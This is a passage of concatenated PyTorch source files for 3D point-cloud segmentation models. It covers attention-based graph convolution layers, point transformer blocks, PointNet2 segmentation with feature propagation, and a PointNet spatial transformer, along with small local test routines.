feature_support = feature_out[:, :, self.out_channel:] #(bs, vertice_num, support_num * out_channel)
# Fuse together - max among product
feature_support = indexing_neighbor(feature_support, neighbor_index) # (bs, vertice_num, neighbor_num, support_num * out_channel)
activation_support = theta * feature_support # (bs, vertice_num, neighbor_num, support_num * out_channel)
activation_support = activation_support.view(bs,vertice_num, neighbor_num, self.support_num, self.out_channel)
activation_support = torch.max(activation_support, dim= 2)[0] # (bs, vertice_num, support_num, out_channel)
activation_support = torch.sum(activation_support, dim= 2) # (bs, vertice_num, out_channel)
feature_fuse = feature_center + activation_support # (bs, vertice_num, out_channel)
feature_fuse = self.multihead_attention(feature_fuse, feature_fuse, feature_fuse)
return feature_fuse
class Attention_Conv_layer(nn.Module):
def __init__(self, in_channel, out_channel, support_num):
super().__init__()
# arguments:
self.in_channel = in_channel
self.out_channel = out_channel
self.support_num = support_num
# parameters:
self.relu = nn.ReLU(inplace= True)
self.query_weights = nn.Parameter(torch.FloatTensor(in_channel, (support_num + 1) * out_channel))
self.query_bias = nn.Parameter(torch.FloatTensor((support_num + 1) * out_channel))
self.query_directions = nn.Parameter(torch.FloatTensor(3, support_num * out_channel))
self.key_weights = nn.Parameter(torch.FloatTensor(in_channel, (support_num + 1) * out_channel))
self.key_bias = nn.Parameter(torch.FloatTensor((support_num + 1) * out_channel))
self.key_directions = nn.Parameter(torch.FloatTensor(3, support_num * out_channel))
self.value_weights = nn.Parameter(torch.FloatTensor(in_channel, (support_num + 1) * out_channel))
self.value_bias = nn.Parameter(torch.FloatTensor((support_num + 1) * out_channel))
self.value_directions = nn.Parameter(torch.FloatTensor(3, support_num * out_channel))
self.multihead_attention = MultiHeadedAttention(4, out_channel, fn_attention=attention)
self.initialize()
def initialize(self):
stdv = 1. / math.sqrt(self.out_channel * (self.support_num + 1))
self.query_weights.data.uniform_(-stdv, stdv)
self.query_bias.data.uniform_(-stdv, stdv)
self.query_directions.data.uniform_(-stdv, stdv)
self.key_weights.data.uniform_(-stdv, stdv)
self.key_bias.data.uniform_(-stdv, stdv)
self.key_directions.data.uniform_(-stdv, stdv)
self.value_weights.data.uniform_(-stdv, stdv)
self.value_bias.data.uniform_(-stdv, stdv)
self.value_directions.data.uniform_(-stdv, stdv)
def forward(self,
neighbor_index: "(bs, vertice_num, neighbor_num)",
vertices: "(bs, vertice_num, 3)",
feature_map: "(bs, vertice_num, in_channel)"):
bs, vertice_num, neighbor_num = neighbor_index.size()
neighbor_direction_norm = get_neighbor_direction_norm(vertices, neighbor_index)
# query
support_query_direction_norm = F.normalize(self.query_directions, dim= 0)
query_theta = neighbor_direction_norm @ support_query_direction_norm # (bs, vertice_num, neighbor_num, support_num * out_channel)
query_theta = self.relu(query_theta)
query_theta = query_theta.contiguous().view(bs, vertice_num, neighbor_num, -1)
# (bs, vertice_num, neighbor_num, support_num * out_channel)
query_feature_out = feature_map @ self.query_weights + self.query_bias # (bs, vertice_num, (support_num + 1) * out_channel)
query_feature_center = query_feature_out[:, :, :self.out_channel] # (bs, vertice_num, out_channel)
query_feature_support = query_feature_out[:, :, self.out_channel:] #(bs, vertice_num, support_num * out_channel)
# Fuse together - max among product
query_feature_support = indexing_neighbor(query_feature_support, neighbor_index) # (bs, vertice_num, neighbor_num, support_num * out_channel)
query_activation_support = query_theta * query_feature_support # (bs, vertice_num, neighbor_num, support_num * out_channel)
query_activation_support = query_activation_support.view(bs,vertice_num, neighbor_num, self.support_num, self.out_channel)
query_activation_support = torch.max(query_activation_support, dim= 2)[0] # (bs, vertice_num, support_num, out_channel)
query_activation_support = torch.sum(query_activation_support, dim= 2) # (bs, vertice_num, out_channel)
query_feature_fuse = query_feature_center + query_activation_support # (bs, vertice_num, out_channel)
# key
support_key_direction_norm = F.normalize(self.key_directions, dim= 0)
key_theta = neighbor_direction_norm @ support_key_direction_norm # (bs, vertice_num, neighbor_num, support_num * out_channel)
key_theta = self.relu(key_theta)
key_theta = key_theta.contiguous().view(bs, vertice_num, neighbor_num, -1)
# (bs, vertice_num, neighbor_num, support_num * out_channel)
key_feature_out = feature_map @ self.key_weights + self.key_bias # (bs, vertice_num, (support_num + 1) * out_channel)
key_feature_center = key_feature_out[:, :, :self.out_channel] # (bs, vertice_num, out_channel)
key_feature_support = key_feature_out[:, :, self.out_channel:] #(bs, vertice_num, support_num * out_channel)
# Fuse together - max among product
key_feature_support = indexing_neighbor(key_feature_support, neighbor_index) # (bs, vertice_num, neighbor_num, support_num * out_channel)
key_activation_support = key_theta * key_feature_support # (bs, vertice_num, neighbor_num, support_num * out_channel)
key_activation_support = key_activation_support.view(bs,vertice_num, neighbor_num, self.support_num, self.out_channel)
key_activation_support = torch.max(key_activation_support, dim= 2)[0] # (bs, vertice_num, support_num, out_channel)
key_activation_support = torch.sum(key_activation_support, dim= 2) # (bs, vertice_num, out_channel)
key_feature_fuse = key_feature_center + key_activation_support # (bs, vertice_num, out_channel)
# value
support_value_direction_norm = F.normalize(self.value_directions, dim= 0)
value_theta = neighbor_direction_norm @ support_value_direction_norm # (bs, vertice_num, neighbor_num, support_num * out_channel)
value_theta = self.relu(value_theta)
value_theta = value_theta.contiguous().view(bs, vertice_num, neighbor_num, -1)
# (bs, vertice_num, neighbor_num, support_num * out_channel)
value_feature_out = feature_map @ self.value_weights + self.value_bias # (bs, vertice_num, (support_num + 1) * out_channel)
value_feature_center = value_feature_out[:, :, :self.out_channel] # (bs, vertice_num, out_channel)
value_feature_support = value_feature_out[:, :, self.out_channel:] #(bs, vertice_num, support_num * out_channel)
# Fuse together - max among product
value_feature_support = indexing_neighbor(value_feature_support, neighbor_index) # (bs, vertice_num, neighbor_num, support_num * out_channel)
value_activation_support = value_theta * value_feature_support # (bs, vertice_num, neighbor_num, support_num * out_channel)
value_activation_support = value_activation_support.view(bs,vertice_num, neighbor_num, self.support_num, self.out_channel)
value_activation_support = torch.max(value_activation_support, dim= 2)[0] # (bs, vertice_num, support_num, out_channel)
value_activation_support = torch.sum(value_activation_support, dim= 2) # (bs, vertice_num, out_channel)
value_feature_fuse = value_feature_center + value_activation_support # (bs, vertice_num, out_channel)
attention_feature = self.multihead_attention(query_feature_fuse, key_feature_fuse, value_feature_fuse)
return attention_feature
class Pool_layer(nn.Module):
def __init__(self, pooling_rate: int= 4, neighbor_num: int= 4):
super().__init__()
self.pooling_rate = pooling_rate
self.neighbor_num = neighbor_num
def forward(self,
vertices: "(bs, vertice_num, 3)",
feature_map: "(bs, vertice_num, channel_num)"):
"""
Return:
vertices_pool: (bs, pool_vertice_num, 3),
feature_map_pool: (bs, pool_vertice_num, channel_num)
"""
bs, vertice_num, _ = vertices.size()
neighbor_index = get_neighbor_index(vertices, self.neighbor_num)
neighbor_feature = indexing_neighbor(feature_map, neighbor_index) #(bs, vertice_num, neighbor_num, channel_num)
pooled_feature = torch.max(neighbor_feature, dim= 2)[0] #(bs, vertice_num, channel_num)
pool_num = int(vertice_num / self.pooling_rate)
sample_idx = torch.randperm(vertice_num)[:pool_num]
vertices_pool = vertices[:, sample_idx, :] # (bs, pool_num, 3)
feature_map_pool = pooled_feature[:, sample_idx, :] #(bs, pool_num, channel_num)
return vertices_pool, feature_map_pool
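# Pool_layer summary: every vertex first takes the channel-wise max over its
# `neighbor_num` nearest neighbors, then a random subset of vertice_num // pooling_rate
# vertices (the same indices for every sample in the batch) is kept together with its
# pooled features.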
def test():
import time
bs = 8
v = 1024
dim = 3
n = 20
vertices = torch.randn(bs, v, dim)
neighbor_index = get_neighbor_index(vertices, n)
s = 3
# conv_1 = Conv_surface(kernel_num= 32, support_num= s)
conv_1 = Attention_Conv_surface2(kernel_num=32, support_num=s)
# conv_2 = Conv_layer(in_channel= 32, out_channel= 64, support_num= s)
conv_2 = Attention_Conv_layer(in_channel= 32, out_channel= 64, support_num= s)
pool = Pool_layer(pooling_rate= 4, neighbor_num= 4)
print("Input size: {}".format(vertices.size()))
start = time.time()
f1 = conv_1(neighbor_index, vertices)
print("\n[1] Time: {}".format(time.time() - start))
print("[1] Out shape: {}".format(f1.size()))
start = time.time()
f2 = conv_2(neighbor_index, vertices, f1)
print("\n[2] Time: {}".format(time.time() - start))
print("[2] Out shape: {}".format(f2.size()))
start = time.time()
v_pool, f_pool = pool(vertices, f2)
print("\n[3] Time: {}".format(time.time() - start))
print("[3] v shape: {}, f shape: {}".format(v_pool.size(), f_pool.size()))
if __name__ == "__main__":
test()
```
#### File: part_seg/model/model_gcn3d_bn_layeratt.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import sys
sys.path.append("../")
import gcn3d
class GCN3D(nn.Module):
def __init__(self, class_num, support_num, neighbor_num):
super().__init__()
self.neighbor_num = neighbor_num
self.num_part = class_num
self.conv_0 = gcn3d.Conv_surface_attention(kernel_num= 128, support_num= support_num)
self.conv_1 = gcn3d.Conv_layer_attention(128, 128, support_num= support_num)
self.pool_1 = gcn3d.Pool_layer(pooling_rate= 4, neighbor_num= 4)
self.conv_2 = gcn3d.Conv_layer_attention(128, 256, support_num= support_num)
self.conv_3 = gcn3d.Conv_layer_attention(256, 256, support_num= support_num)
self.pool_2 = gcn3d.Pool_layer(pooling_rate= 4, neighbor_num= 4)
self.conv_4 = gcn3d.Conv_layer_attention(256, 512, support_num= support_num)
dim_fuse = sum([128, 128, 256, 256, 512, 512, 16])
self.conv1d_block = nn.Sequential(
nn.Conv1d(dim_fuse, 512, 1),
nn.ReLU(inplace= True),
nn.Conv1d(512, 512, 1),
nn.ReLU(inplace= True),
nn.Conv1d(512, class_num, 1),
)
self.bn0 = nn.BatchNorm1d(128, momentum=0.1)
self.bn1 = nn.BatchNorm1d(128, momentum=0.1)
self.bn2 = nn.BatchNorm1d(256, momentum=0.1)
self.bn3 = nn.BatchNorm1d(256, momentum=0.1)
def forward(self,
vertices: "tensor (bs, vertice_num, 3)",
onehot: "tensor (bs, cat_num)",
gt=None):
"""
Return: (bs, vertice_num, class_num)
"""
vertices = torch.transpose(vertices, 1, 2)
bs, vertice_num, _ = vertices.size()
#neighbor_index = gcn3d.get_neighbor_index(vertices, self.neighbor_num)
neighbor_index, neighbor_value = gcn3d.get_neighbor_index_value(vertices, self.neighbor_num)
fm_0 = F.relu(self.bn0(self.conv_0(neighbor_index, vertices, neighbor_value).transpose(2, 1)).transpose(2, 1), inplace= True)
fm_1 = F.relu(self.bn1(self.conv_1(neighbor_index, vertices, fm_0, neighbor_value).transpose(2, 1)).transpose(2, 1), inplace= True)
v_pool_1, fm_pool_1 = self.pool_1(vertices, fm_1)
neighbor_index, neighbor_value = gcn3d.get_neighbor_index_value(v_pool_1, self.neighbor_num)
fm_2 = F.relu(self.bn2(self.conv_2(neighbor_index, v_pool_1, fm_pool_1, neighbor_value).transpose(2, 1)).transpose(2, 1), inplace= True)
fm_3 = F.relu(self.bn3(self.conv_3(neighbor_index, v_pool_1, fm_2, neighbor_value).transpose(2, 1)).transpose(2, 1), inplace= True)
#print("add bn")
v_pool_2, fm_pool_2 = self.pool_2(v_pool_1, fm_3)
neighbor_index, neighbor_value = gcn3d.get_neighbor_index_value(v_pool_2, self.neighbor_num)
fm_4 = self.conv_4(neighbor_index, v_pool_2, fm_pool_2, neighbor_value)
f_global = fm_4.max(1)[0] #(bs, f)
nearest_pool_1 = gcn3d.get_nearest_index(vertices, v_pool_1)
nearest_pool_2 = gcn3d.get_nearest_index(vertices, v_pool_2)
fm_2 = gcn3d.indexing_neighbor(fm_2, nearest_pool_1).squeeze(2)
fm_3 = gcn3d.indexing_neighbor(fm_3, nearest_pool_1).squeeze(2)
fm_4 = gcn3d.indexing_neighbor(fm_4, nearest_pool_2).squeeze(2)
f_global = f_global.unsqueeze(1).repeat(1, vertice_num, 1)
onehot = onehot.unsqueeze(1).repeat(1, vertice_num, 1) #(bs, vertice_num, cat_one_hot)
fm_fuse = torch.cat([fm_0, fm_1, fm_2, fm_3, fm_4, f_global, onehot], dim= 2)
conv1d_input = fm_fuse.permute(0, 2, 1) #(bs, fuse_ch, vertice_num)
conv1d_out = self.conv1d_block(conv1d_input)
conv1d_out = F.log_softmax(conv1d_out, dim=1)
pred = conv1d_out.permute(0, 2, 1) #(bs, vertice_num, ch)
if gt is not None:
return pred, F.nll_loss(pred.contiguous().view(-1, self.num_part), gt.view(-1, 1)[:, 0])
else:
return pred
def test():
from dataset_shapenet import test_model
dataset = "../../shapenetcore_partanno_segmentation_benchmark_v0"
model = GCN3D(class_num= 50, support_num= 1, neighbor_num= 50)
test_model(model, dataset, cuda= "0", bs= 2, point_num= 2048)
if __name__ == "__main__":
test()
```
#### File: PAConv/part_seg/modules.py
```python
from copy import deepcopy
import torch
import torch.nn as nn
import torch.nn.functional as F
from lib.pointops.functions import pointops
EPSILON = 1e-8
class PointTransformerLayer_old(nn.Module):
def __init__(self,
in_channels,
out_channels=None,
num_neighbors=16):
super(PointTransformerLayer_old, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.to_query = nn.Conv1d(in_channels, self.out_channels, kernel_size=1)
self.to_key = nn.Conv1d(in_channels, self.out_channels, kernel_size=1)
self.to_value = nn.Conv1d(in_channels, self.out_channels, kernel_size=1)
self.to_pos_enc = nn.Sequential(
nn.Conv2d(3, 3, kernel_size=1, bias=False),
nn.BatchNorm2d(3),
nn.ReLU(inplace=True),
nn.Conv2d(3, self.out_channels, kernel_size=1)
)
self.to_attn = nn.Sequential(
nn.BatchNorm2d(self.out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(self.out_channels, self.out_channels, kernel_size=1, bias=False),
nn.BatchNorm2d(self.out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(self.out_channels, self.out_channels, kernel_size=1)
)
self.key_grouper = pointops.QueryAndGroup(nsample=num_neighbors, return_idx=True)
self.value_grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=False)
self.softmax = nn.Softmax(dim=-1) # (B, C_out, N, K)
def forward(self, px):
# points, p: (B, N, 3)
# in_features, x: (B, C_in, N)
p, x = px
# query, key, and value
q = self.to_query(x) # (B, C_out, N)
k = self.to_key(x) # (B, C_out, N)
v = self.to_value(x) # (B, C_out, N)
# neighbor search
n_k, _, n_idx = self.key_grouper(xyz=p, features=k) # (B, 3+C_out, N, K)
n_v, _ = self.value_grouper(xyz=p, features=v, idx=n_idx.int()) # (B, C_out, N, K)
# relative positional encoding
n_r = self.to_pos_enc(n_k[:, 0:3, :, :]) # (B, C_out, N, K)
n_v = n_v
energy = q.unsqueeze(-1) - n_k[:, 3:, :, :] + n_r
# self-attention
a = self.to_attn(energy) # (B, C_out, N, K)
a = self.softmax(a)
y = torch.sum(n_v * a, dim=-1, keepdim=False)
return [p, y]
class PointTransformerLayer_L(nn.Module):
def __init__(self,
in_channels,
out_channels=None,
num_neighbors=16):
super(PointTransformerLayer_L, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.chunk = nn.TransformerEncoderLayer(d_model=in_channels, dim_feedforward=2 * in_channels, dropout=0.0, nhead=4)
self.pe = nn.Sequential(
nn.Conv2d(3, 3, kernel_size=1, bias=False),
nn.BatchNorm2d(3),
nn.ReLU(inplace=True),
nn.Conv2d(3, self.out_channels, kernel_size=1)
)
self.fc = nn.Conv1d(in_channels, self.out_channels, 1)
self.grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=False)
self.softmax = nn.Softmax(dim=-1) # (B, C_out, N, K)
def forward(self, px):
# points, p: (B, N, 3)
# in_features, x: (B, C_in, N)
p, x = px
group_features, grouped_xyz = self.grouper(xyz=p, features=x)
#print("new.shape:",group_features.shape, grouped_xyz.shape)
position_encoding = self.pe(grouped_xyz)
input_features = group_features + position_encoding
#print("input_features.shape", input_features.shape)
B, D, np, ns = input_features.shape
input_features = input_features.permute(0, 2, 1, 3).reshape(-1, D, ns).permute(2, 0, 1)
#print("input_features_new.shape", input_features.shape)
transformed_feats = self.chunk(input_features).permute(1, 2, 0).reshape(B, np, D, ns).transpose(1, 2)
#print("transformed_feats.shape", transformed_feats.shape)
output_features = F.max_pool2d(transformed_feats, kernel_size=[1, ns]).squeeze(-1) # (B, C, npoint)
#print("output_features.shape", output_features.shape)
output_features = self.fc(output_features).squeeze(-1)
#print("output_features.shape", output_features.shape)
return [p, output_features]
class PointTransformerLayer_G(nn.Module):
def __init__(self,
in_channels,
out_channels=None,
num_neighbors=16):
super(PointTransformerLayer_G, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.chunk = nn.TransformerEncoderLayer(d_model=in_channels, dim_feedforward=2 * in_channels, dropout=0.0, nhead=4)
self.pe = nn.Sequential(
nn.Conv1d(3, 3, kernel_size=1, bias=False),
nn.BatchNorm1d(3),
nn.ReLU(inplace=True),
nn.Conv1d(3, self.out_channels, kernel_size=1)
)
self.fc = nn.Conv1d(in_channels, self.out_channels, 1)
self.grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=False)
self.softmax = nn.Softmax(dim=-1) # (B, C_out, N, K)
def forward(self, px):
p, x = px
xyz_flipped = p.transpose(1, 2)
position_encoding = self.pe(xyz_flipped)
input_features = x + position_encoding
input_features = input_features.permute(2, 0, 1)
transformed_feats = self.chunk(input_features).permute(1, 2, 0)
output_features = self.fc(transformed_feats).squeeze(-1)
return [p, output_features]
class PointTransformerBlock(nn.Module):
def __init__(self,
in_channels,
out_channels=None,
num_neighbors=16):
super(PointTransformerBlock, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.linear1 = nn.Conv1d(in_channels, self.out_channels, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm1d(self.out_channels)
self.transformer_l = PointTransformerLayer_L(self.out_channels, num_neighbors=num_neighbors)
self.bn_l = nn.BatchNorm1d(self.out_channels)
self.transformer_g = PointTransformerLayer_G(self.out_channels, num_neighbors=num_neighbors)
self.bn_g = nn.BatchNorm1d(self.out_channels)
self.linear2 = nn.Conv1d(self.out_channels, self.out_channels, kernel_size=1, bias=False)
self.bn2 = nn.BatchNorm1d(self.out_channels)
self.relu = nn.ReLU(inplace=True)
def forward(self, px):
p, x = px
y = self.relu(self.bn1(self.linear1(x)))
y = self.relu(self.bn_l(self.transformer_l([p, y])[1]))
y = self.relu(self.bn_g(self.transformer_g([p, y])[1]))
y = self.bn2(self.linear2(y))
y += x
y = self.relu(y)
return [p, y]
class TransitionDown(nn.Module):
def __init__(self,
in_channels,
out_channels=None,
stride=4,
num_neighbors=16):
assert stride > 1
super(TransitionDown, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.stride = stride
self.grouper = pointops.QueryAndGroup(nsample=num_neighbors, use_xyz=True)
self.mlp = nn.Sequential(
nn.Conv2d(3 + in_channels, self.out_channels, kernel_size=1, bias=False),
nn.BatchNorm2d(self.out_channels),
nn.ReLU(inplace=True),
nn.Conv2d(self.out_channels, self.out_channels, kernel_size=1, bias=False),
nn.BatchNorm2d(self.out_channels),
nn.ReLU(inplace=True)
)
self.max_pool = nn.MaxPool2d((1, num_neighbors))
def forward(self, p1x):
# points, p: (B, N, 3)
# in_features, x: (B, C_in, N)
p1, x = p1x
# furthest point sampling and neighbor search
M = x.shape[-1] // self.stride
p1_trans = p1.transpose(1, 2).contiguous() # (B, 3, N)
p2 = pointops.gathering(p1_trans, pointops.furthestsampling(p1, M)).transpose(1, 2).contiguous()
n_x, _ = self.grouper(xyz=p1, new_xyz=p2, features=x) # (B, 3 + C_in, M, K)
# mlp and local max pooling
n_y = self.mlp(n_x) # (B, C_out, M, K)
y = self.max_pool(n_y).squeeze(-1) # (B, C_out, M)
return [p2, y]
class TransitionUp(nn.Module):
def __init__(self, in_channels, out_channels=None, skip_channels=None):
super(TransitionUp, self).__init__()
self.out_channels = in_channels if out_channels is None else out_channels
self.skip_channels = in_channels if skip_channels is None else skip_channels
self.linear1 = nn.Sequential(
nn.Conv1d(in_channels, self.out_channels, kernel_size=1, bias=False),
nn.BatchNorm1d(self.out_channels),
nn.ReLU(inplace=True)
)
self.linear2 = nn.Sequential(
nn.Conv1d(self.skip_channels, self.out_channels, kernel_size=1, bias=False),
nn.BatchNorm1d(self.out_channels),
nn.ReLU(inplace=True)
)
def forward(self, p1x1, p2x2):
# in_points, p1: (B, N, 3)
# in_features, x1: (B, C_in, N)
# skip_points, p2: (B, M, 3)
# skip_features, x2: (B, C_skip, M)
p1, x1 = p1x1
p2, x2 = p2x2
# Three nearest neighbor upsampling
dist, idx = pointops.nearestneighbor(p2, p1)
dist_recip = 1.0 / (dist + EPSILON)
norm = torch.sum(dist_recip, dim=2, keepdim=True)
weight = dist_recip / norm
up_x1 = pointops.interpolation(self.linear1(x1), idx, weight)
# aggregation
y = self.linear2(x2) + up_x1 # (B, C_out, M)
return [p2, y]
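# TransitionUp interpolates the coarse features x1 onto the denser skip points p2 using
# inverse-distance weighting over the nearest neighbors returned by pointops.nearestneighbor:
# weight_i = (1 / (d_i + EPSILON)) / sum_j (1 / (d_j + EPSILON)), then adds the linearly
# projected skip features x2 (as used in SimplePointTransformerSeg below, x1 is the coarse
# level and x2 the full-resolution skip level).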
# Just for debugging
class SimplePointTransformerSeg(nn.Module):
def __init__(self, in_channels, num_classes, num_neighbors):
super(SimplePointTransformerSeg, self).__init__()
hidden_channels = in_channels * 4
# encoder
self.in_mlp = nn.Sequential(
nn.Conv1d(in_channels, hidden_channels, kernel_size=1, bias=False),
nn.BatchNorm1d(hidden_channels),
nn.ReLU(inplace=True),
nn.Conv1d(hidden_channels, hidden_channels, kernel_size=1, bias=False),
nn.BatchNorm1d(hidden_channels),
nn.ReLU(inplace=True)
)
self.block1 = PointTransformerBlock(hidden_channels, num_neighbors=num_neighbors)
self.down = TransitionDown(hidden_channels, num_neighbors=num_neighbors)
self.block2 = PointTransformerBlock(hidden_channels, num_neighbors=num_neighbors)
# decoder
self.up = TransitionUp(hidden_channels)
self.block3 = PointTransformerBlock(hidden_channels, num_neighbors=num_neighbors)
self.out_mlp = nn.Sequential(
nn.Conv1d(hidden_channels, hidden_channels, kernel_size=1, bias=False),
nn.BatchNorm1d(hidden_channels),
nn.ReLU(inplace=True),
nn.Conv1d(hidden_channels, num_classes, kernel_size=1)
)
def _break_up_pc(self, pc):
xyz = pc[..., 0:3].contiguous()
features = pc[..., 3:].transpose(1, 2).contiguous() if pc.size(-1) > 3 else deepcopy(xyz)
return xyz, features
def forward(self, pc):
# stride == 1
p1, x1 = self._break_up_pc(pc)
x1 = self.in_mlp(x1)
p1x1 = self.block1([p1, x1])
# stride == 4
p4x4 = self.down(p1x1)
p4x4 = self.block2(p4x4)
# stride == 1
p1y = self.up(p4x4, p1x1)
p1y = self.block3(p1y)
y = self.out_mlp(p1y[1])
return y
if __name__ == "__main__":
from time import time
assert torch.cuda.is_available()
B, C_in, C_out, N, K = 4, 6, 20, 1024, 16
model = SimplePointTransformerSeg(C_in, C_out, K).cuda()
pc = torch.randn(B, N, 3 + C_in).cuda()
s = time()
y = model(pc)
d = time() - s
print("Elapsed time (sec):", d)
print(y.shape)
```
#### File: lib/paconv_lib/functional.py
```python
from . import functions
def assign_score_withk(score, feat, center_feat, grouped_idx, aggregate='sum'):
return functions.assign_score_withk(score, feat, center_feat, grouped_idx, aggregate)
```
#### File: model/pointnet2/pointnet2_paconv_seg.py
```python
from collections import namedtuple
import torch
import torch.nn as nn
from model.pointnet2.pointnet2_paconv_modules import PointNet2FPModule
from util import block
class PointNet2SSGSeg(nn.Module):
r"""
PointNet2 with single-scale grouping
Semantic segmentation network that uses feature propagation layers
Parameters
----------
k: int
Number of semantic classes to predict over -- size of the softmax classifier that runs for each point
c: int = 6
Number of input channels in the feature descriptor for each point. If the point cloud is Nx9, this
value should be 6 as in an Nx9 point cloud, 3 of the channels are xyz, and 6 are feature descriptors
use_xyz: bool = True
Whether or not to use the xyz position of a point as a feature
"""
def __init__(self, c=3, k=13, use_xyz=True, args=None):
super().__init__()
self.nsamples = args.get('nsamples', [32, 32, 32, 32])
self.npoints = args.get('npoints', [None, None, None, None])
self.sa_mlps = args.get('sa_mlps', [[c, 32, 32, 64], [64, 64, 64, 128], [128, 128, 128, 256], [256, 256, 256, 512]])
self.fp_mlps = args.get('fp_mlps', [[128 + c, 128, 128, 128], [256 + 64, 256, 128], [256 + 128, 256, 256], [512 + 256, 256, 256]])
self.paconv = args.get('pointnet2_paconv', [True, True, True, True, False, False, False, False])
self.fc = args.get('fc', 128)
if args.get('cuda', False):
from model.pointnet2.pointnet2_paconv_modules import PointNet2SAModuleCUDA as PointNet2SAModule
else:
from model.pointnet2.pointnet2_paconv_modules import PointNet2SAModule
self.SA_modules = nn.ModuleList()
self.SA_modules.append(PointNet2SAModule(npoint=self.npoints[0], nsample=self.nsamples[0], mlp=self.sa_mlps[0], use_xyz=use_xyz,
use_paconv=self.paconv[0], args=args))
self.SA_modules.append(PointNet2SAModule(npoint=self.npoints[1], nsample=self.nsamples[1], mlp=self.sa_mlps[1], use_xyz=use_xyz,
use_paconv=self.paconv[1], args=args))
self.SA_modules.append(PointNet2SAModule(npoint=self.npoints[2], nsample=self.nsamples[2], mlp=self.sa_mlps[2], use_xyz=use_xyz,
use_paconv=self.paconv[2], args=args))
self.SA_modules.append(PointNet2SAModule(npoint=self.npoints[3], nsample=self.nsamples[3], mlp=self.sa_mlps[3], use_xyz=use_xyz,
use_paconv=self.paconv[3], args=args))
self.FP_modules = nn.ModuleList()
self.FP_modules.append(PointNet2FPModule(mlp=self.fp_mlps[0], use_paconv=self.paconv[4], args=args))
self.FP_modules.append(PointNet2FPModule(mlp=self.fp_mlps[1], use_paconv=self.paconv[5], args=args))
self.FP_modules.append(PointNet2FPModule(mlp=self.fp_mlps[2], use_paconv=self.paconv[6], args=args))
self.FP_modules.append(PointNet2FPModule(mlp=self.fp_mlps[3], use_paconv=self.paconv[7], args=args))
self.FC_layer = nn.Sequential(block.Conv2d(self.fc, self.fc, bn=True), nn.Dropout(), block.Conv2d(self.fc, k, activation=None))
def _break_up_pc(self, pc):
xyz = pc[..., 0:3].contiguous()
features = (pc[..., 3:].transpose(1, 2).contiguous() if pc.size(-1) > 3 else None)
return xyz, features
def forward(self, pointcloud: torch.cuda.FloatTensor):
r"""
Forward pass of the network
Parameters
----------
pointcloud: Variable(torch.cuda.FloatTensor)
(B, N, 3 + input_channels) tensor
Point cloud to run predictions on.
Each point in the point cloud MUST
be formatted as (x, y, z, features...)
"""
xyz, features = self._break_up_pc(pointcloud)
l_xyz, l_features = [xyz], [features]
for i in range(len(self.SA_modules)):
li_xyz, li_features = self.SA_modules[i](l_xyz[i], l_features[i])
l_xyz.append(li_xyz)
l_features.append(li_features)
for i in range(-1, -(len(self.FP_modules) + 1), -1):
l_features[i - 1] = self.FP_modules[i](l_xyz[i - 1], l_xyz[i], l_features[i - 1], l_features[i])
# return self.FC_layer(l_features[0])
return self.FC_layer(l_features[0].unsqueeze(-1)).squeeze(-1)
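# The feature-propagation loop above walks from the coarsest SA level back to the input
# resolution (i = -1 .. -len(FP_modules)); each FP module interpolates l_features[i] onto
# the points l_xyz[i - 1] and fuses the result with the skip features l_features[i - 1].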
def model_fn_decorator(criterion):
ModelReturn = namedtuple("ModelReturn", ['preds', 'loss', 'acc'])
def model_fn(model, data, eval=False):
with torch.set_grad_enabled(not eval):
inputs, labels = data
inputs = inputs.cuda(non_blocking=True)
labels = labels.cuda(non_blocking=True)
preds = model(inputs)
loss = criterion(preds, labels)
_, classes = torch.max(preds, 1)
acc = (classes == labels).float().sum() / labels.numel()
return ModelReturn(preds, loss, {"acc": acc.item(), 'loss': loss.item()})
return model_fn
if __name__ == "__main__":
import torch.optim as optim
B, N, C, K = 2, 4096, 3, 13
inputs = torch.randn(B, N, 6)#.cuda()
labels = torch.randint(0, 3, (B, N))#.cuda()
model = PointNet2SSGSeg(c=C, k=K)#.cuda()
optimizer = optim.SGD(model.parameters(), lr=5e-2, momentum=0.9, weight_decay=1e-4)
print("Testing SSGCls with xyz")
model_fn = model_fn_decorator(nn.CrossEntropyLoss())
for _ in range(5):
optimizer.zero_grad()
_, loss, _ = model_fn(model, (inputs, labels))
loss.backward()
print(loss.item())
optimizer.step()
model = PointNet2SSGSeg(c=C, k=K, use_xyz=False)#.cuda()
optimizer = optim.SGD(model.parameters(), lr=5e-2, momentum=0.9, weight_decay=1e-4)
print("Testing SSGCls without xyz")
model_fn = model_fn_decorator(nn.CrossEntropyLoss())
for _ in range(5):
optimizer.zero_grad()
_, loss, _ = model_fn(model, (inputs, labels))
loss.backward()
print(loss.item())
optimizer.step()
```
#### File: model/pointnet/pointnet.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class STN3D(nn.Module):
def __init__(self, c):
super(STN3D, self).__init__()
self.c = c
self.conv1 = nn.Conv1d(self.c, 64, 1)
self.conv2 = nn.Conv1d(64, 128, 1)
self.conv3 = nn.Conv1d(128, 1024, 1)
self.mp = nn.AdaptiveMaxPool1d(1)
self.fc1 = nn.Linear(1024, 512)
self.fc2 = nn.Linear(512, 256)
self.fc3 = nn.Linear(256, self.c*self.c)
self.bn1 = nn.BatchNorm1d(64)
self.bn2 = nn.BatchNorm1d(128)
self.bn3 = nn.BatchNorm1d(1024)
self.bn4 = nn.BatchNorm1d(512)
self.bn5 = nn.BatchNorm1d(256)
def forward(self, x):
batch_size = x.size()[0]
x = F.relu(self.bn1(self.conv1(x)))
x = F.relu(self.bn2(self.conv2(x)))
x = F.relu(self.bn3(self.conv3(x)))
x = self.mp(x)
x = x.view(-1, 1024)
x = F.relu(self.bn4(self.fc1(x)))
x = F.relu(self.bn5(self.fc2(x)))
x = self.fc3(x)
iden = torch.eye(self.c).view(1, -1).repeat(batch_size, 1)
if x.is_cuda:
iden = iden.cuda()
x = x + iden
x = x.view(-1, self.c, self.c)
return x
